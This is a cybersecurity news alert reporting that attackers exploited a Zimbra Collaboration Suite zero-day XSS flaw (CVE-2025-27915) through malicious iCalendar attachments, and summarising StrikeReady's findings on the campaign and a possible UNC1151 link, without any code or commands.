Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Alerts

Hackers Exploit Zimbra Zero Day Flaw

October 6, 2025
Reading Time: 3 mins read
in Alerts
CISA Adds New Flaws to KEV Catalog

A newly discovered zero-day vulnerability in Zimbra’s Collaboration Suite (ZCS) was recently exploited in targeted attacks. The attacks, which began in early January, leveraged a flaw in how the software processes iCalendar (.ICS) files, a common format for sharing calendar and scheduling information. By embedding a malicious JavaScript payload within a seemingly benign calendar attachment, attackers were able to execute code within a victim’s webmail session.

This cross-site scripting (XSS) vulnerability, tracked as CVE-2025-27915, existed due to insufficient sanitization of HTML content within these .ICS files. It allowed attackers to perform a range of malicious actions, including stealing user credentials, emails, and contacts, as well as setting up mail filters to forward new messages to an attacker-controlled address. Although Zimbra released patches on January 27, it did not acknowledge any active exploitation at the time.

However, security researchers at StrikeReady were able to uncover the attacks by specifically monitoring for .ICS files larger than 10KB that contained JavaScript code. They discovered that a threat actor had spoofed a Libyan Navy email to deliver the exploit to a Brazilian military organization. The malicious file was just over 10KB and used obfuscated JavaScript code to avoid detection. The payload was designed to execute asynchronously and perform various actions, like creating hidden login fields to steal credentials and using the Zimbra SOAP API to retrieve emails.

The researchers’ analysis revealed that the malicious code was highly sophisticated, incorporating a number of tactics to ensure a stealthy and persistent presence. It had the ability to monitor user activity, exfiltrate contacts and shared folders, and even hide certain user interface elements to avoid detection. The code also included a 60-second delay before execution and an execution gate that prevented it from running again for three days, further aiding its evasion efforts.

While StrikeReady couldn’t definitively attribute the attack to a specific group, they noted that the exploit of a zero-day vulnerability suggests the involvement of a highly skilled threat actor. They also pointed out that some of the tactics, techniques, and procedures (TTPs) observed in the attack were similar to those used by UNC1151, a group reportedly linked to the Belarusian government. Following the discovery, Zimbra acknowledged the issue and advised users to update their software, review mail filters for unauthorized changes, and monitor for suspicious network activity.

Reference:

  • Hackers Exploit Zimbra Zero Day via Malicious iCalendar Files
Tags: Cyber AlertsCyber Alerts 2025CyberattackCybersecurityOctober 2025
ADVERTISEMENT

Related Posts

Toys R Us Canada Data Breach Alert

Fake LastPass Death Claims Breach Vaults

October 28, 2025
Toys R Us Canada Data Breach Alert

ChatGPT Atlas Browser Fooled By Fake Url

October 28, 2025
Toys R Us Canada Data Breach Alert

Chrome Zero Day Delivers LeetAgent

October 28, 2025
Qilin Ransomware Uses Hybrid Attack

Qilin Ransomware Uses Hybrid Attack

October 28, 2025
Qilin Ransomware Uses Hybrid Attack

Hackers Exploit Outdated WordPress Plugins

October 28, 2025
Smishing Triad Tied To Global Phishing

Smishing Triad Tied To Global Phishing

October 28, 2025

Latest Alerts

Fake LastPass Death Claims Breach Vaults

ChatGPT Atlas Browser Fooled By Fake Url

Chrome Zero Day Delivers LeetAgent

Smishing Triad Tied To Global Phishing

Qilin Ransomware Uses Hybrid Attack

Hackers Exploit Outdated WordPress Plugins

Subscribe to our newsletter

    Latest Incidents

    Google Contractor Steals Play Files

    Vibra Hospital Data Breach Probe

    Hackers Target Swedish Power Grid

    Ex-L3Harris Cyber Boss Charged With Espionage

    Safepay Hits Xortec Video Surveillance Firm

    Hackers Breach Verstappen Data

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial